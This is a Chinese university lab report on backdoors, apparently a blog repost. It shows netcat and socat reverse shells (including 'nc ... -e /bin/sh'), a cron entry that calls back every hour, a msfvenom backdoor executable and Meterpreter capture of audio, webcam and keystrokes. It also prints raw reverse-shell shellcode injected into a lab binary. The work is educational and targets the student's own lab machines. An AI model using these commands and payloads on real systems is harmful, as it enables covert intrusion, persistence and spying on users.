后门原理与实践
作者:互联网
后门原理与实践
20191306张宇鹏
实验基础
本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。
基础知识
后门的概念
后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。
常用后门工具
- NC和Netcat
底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。- 在Linux系统中一般自带netcat,使用man nc命令可以查看使用帮助
- 在Windows系统中,需要下载ncat.rar,解压后可使用
- SoCat
相当于Netcat++,一个超级Netcat工具。
在Windows下可以下载socat.rar,使用README作为参考。
任何代理、转发等功能都可以用该工具实现。 - Meterpreter
一个用来生成后门程序的程序。
它包含着后门的- 基本功能(基本的连接、执行指令)
- 扩展功能(如搜集用户信息、安装服务等功能)
- 编码模式
- 运行平台
- 运行参数
它把后门的内容全部做成零件或可调整的参数,按需组合使用形成需要的可执行文件。
常见的Meterpreter程序有
- intersect
- Metaspolit的msfvenom指令
- Veil-evasion
本次实验我们使用msfvenom指令生成后门可执行文件Meterpreter。
实验目标
- 使用netcat获取主机操作Shell,cron启动
- 使用socat获取主机操作Shell,任务计划启动
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
实验环境
环境
- 主机:Windows 10;
- 靶机:Kali Linux Debian 10;
实验过程
一、使用netcat获取主机操作Shell,启动cron
在主机中使用ncat -l -p 1306监听本机的1306端口
在虚拟机中使用nc 192.168.203.37(主机IP) 1306 -e /bin/sh连接主机反弹shell
成功getshell
在虚拟机中获取主机shell
在虚拟机中用nc -l -p 1306监听主机1306端口
在主机中输入ncat -e cmd 192.168.186.141 1306
成功getshell
在虚拟机中启动cron并在主机监听
先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)
在最后一行添加33 * * * * nc 192.168.203.37 1306 -e /bin/sh,即在每个小时的第33分钟反向连接Windows主机的1306端口
每小时的33分,在ip地址为192.168.203.37的主机端用ncat -l -p 1306打开监听即可
二、使用socat获取主机操作Shell,任务计划启动
在Windows获得Linux Shell
在Windows中打开任务计划程序,创建任务
在Kali中输入命令socat - tcp:192.168.101.85:1306
成功获取Windows的Shell
三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上生成后门可执行程序20191306_backdoor.exe
在Windows上打开监听
在Kali上用nc 192.168.1.105 1306 < 20191306_backdoor.exe将生成的20191306_backdoor.exe后门程序传过去
在kali上使用msfconsole指令进入msf控制台
对msf控制台进行配置
接着输入exploit进行监听,在Windows在打开20191306_backdoor.exe后成功获取到Windows的shell
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
获取目标主机音频、摄像头、击键记录等
五、使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在一台kali终端中开启监听
gdb查看后确认shellcode为\x40\xd1\xff\xff\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x90\x89\x66\x68\x04\xb6\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1
在另一终端用msfexploit监听
注入shellcode后成功获得shell
六、基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
不在正规网站下载程序导致捆绑软件的安装
(2)例举你知道的后门如何启动起来(win及linux)的方式?
windows中有“shift后门启动”、“注册表自启动”等方式
(3)Meterpreter有哪些给你映像深刻的功能?
Meterpreter基本命令的多种多样,并且各种命令比如search命令、download命令的功能的强大给我留下了很深刻的印象
(4)如何发现自己有系统有没有被安装后门?
查看控制面板
查看任务管理器
查看系统自动启动列表
通过msconfig看系统启动是否加载了什么奇怪的程序或者服务
七、实验心得
经过本次实验,我掌握了ncat、socat等工具的一些使用方法,对于后门程序的实现和功能有了一定理解,在使用msf控制台过程中出现过连接失败的现象,更换了一条指令后很快的解决了,整体来说还是很顺利的。
标签:后门,1306,Shell,Windows,主机,实践,使用,原理 来源: https://www.cnblogs.com/1208499954qzone/p/16089990.html